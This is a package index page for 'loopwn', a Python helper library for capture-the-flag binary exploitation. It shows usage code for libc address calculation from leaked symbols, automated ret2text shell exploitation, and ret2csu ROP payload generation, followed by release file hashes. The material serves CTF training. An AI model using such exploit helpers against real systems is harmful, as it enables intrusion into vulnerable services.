A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
csu_end, csu_start,
r12=0x601018, # Function pointer (e.g., GOT address)
r13=0, # Arg1 (EDI)
r14=1, # Arg2 (RSI)
r15=2, # Arg3 (RDX)
return_addr=0x401120,
padding=0x20
)
# Send payload
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get
systemand/bin/shaddresses via properties. - Auto Ret2Text: Generate payload and get shell in one line with
loop2text. - Auto Ret2CSU: Simplify Ret2CSU payload construction with
loopcsu. - Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from
pwntools'sELFclass.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
loopwn-0.3.10.tar.gz
(9.0 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file loopwn-0.3.10.tar.gz.
File metadata
- Download URL: loopwn-0.3.10.tar.gz
- Upload date:
- Size: 9.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
c0e17bf6f22c7e0a8c0e6663275e11337ac2a023b6906755a407e4af87babffb
|
|
| MD5 |
5896ca13e829cef2bfdfc9449b1441e7
|
|
| BLAKE2b-256 |
11d9fb48e7e09325ff78450d4bbf19f01db766700c7d63c6e497b89ce3985ffd
|
File details
Details for the file loopwn-0.3.10-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.10-py3-none-any.whl
- Upload date:
- Size: 9.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
ad0d56d4098bf299c57a28064e87d6e34aa6b96d3a58d2d3fbf49392e5114713
|
|
| MD5 |
a20cd2473796ed182094d8542da5e472
|
|
| BLAKE2b-256 |
c3111812d28f66ecf4f68c49f61c1e880f8436623968f661f9e3dc6abefab987
|
